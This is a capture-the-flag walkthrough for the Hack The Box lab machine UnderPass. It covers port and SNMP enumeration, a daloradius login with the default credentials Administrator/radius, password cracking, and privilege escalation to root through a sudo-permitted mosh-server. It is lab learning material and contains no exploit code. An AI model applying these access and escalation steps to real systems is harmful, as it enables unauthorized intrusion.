UnderPass
Intro.
Hello everyone today we have the latest hack the box machine called UnderPass let's get right into it.
Enumeration.
Port scanning.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK+kvbyNUglQLkP2Bp7QVhfp7EnRWMHVtM7xtxk34WU5s+lYksJ07/lmMpJN/bwey1SVpG0FAgL0C/+2r71XUEo=
| 256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ8XNCLFSIxMNibmm+q7mFtNDYzoGAJ/vDNa6MUjfU91
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.52 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
As we can see we have HTTP and SSH.
HTTP
I enumerate Everything from directory brute forcing, Path traversal , common apache misconfiguration , subdomains.
I also found a CVE for the apache version which is HTTP smuggling.
BUT nothing was there.
UDP ports.
UDP port something i fogot to enumerate but when i did i found this.
PORT STATE SERVICE
161/udp open snmp
1812/udp open|filtered radius
1813/udp open|filtered radacctWe have SNMP open let's see what we can do with this.
Enumerate SNMP.
after some search i came across usefull tool called snmpbulkwalk. which shows use the following results.
For more information about SNMP you can refer to this.
From the above image we can tell few things.
There is a user called steve
we have whats called daloradius server.
what is daloradius server.
you can find more here.
since we have creds we may try to login with it maybe guessing the password. But here we can find the login page. http://underpass.htb/daloradius/app/operators/login.php
after login and guessing i tried the default creds and they actually works
Default creds are
Administrator/radius
Shell As svcMosh
As you can see in the image above in the green box we have a user Let's see more.
As you can see in the image the user has a password i tried to login with this password but no luck so i was sure that this password is hashed to i used crackstation to crack it.
Let's SSH.
As you can see we are able to find the user flag.
Shell as Root.
To get root shell let's see what permission we have. "sudo -l"
so we can run something called mosh-server but what is that ???.
Going though the offical page we can find that there also a tool called mosh-client which allow us to connect to mosh-server. It also says that there is not need to run mosh-server as root meaning there is something wrong.
Going to the mosh-client in the offical page we can also see there there is a base64 HEX key been generated when we start mosh-server session we can set that as MOSH_KEY env variable as require when we tried to connect to mosh-server.
But where can we find it.
Here we can use this key as our MOSH_KEY and after that we connect using mosh-client from our machine or from the local machine it self and we will get root shell.
Conclusion
At the end this machine was so fun its an easy machine but it has a lot of new things from the initial access to the privilege escalation quite of fun an learning
Last updated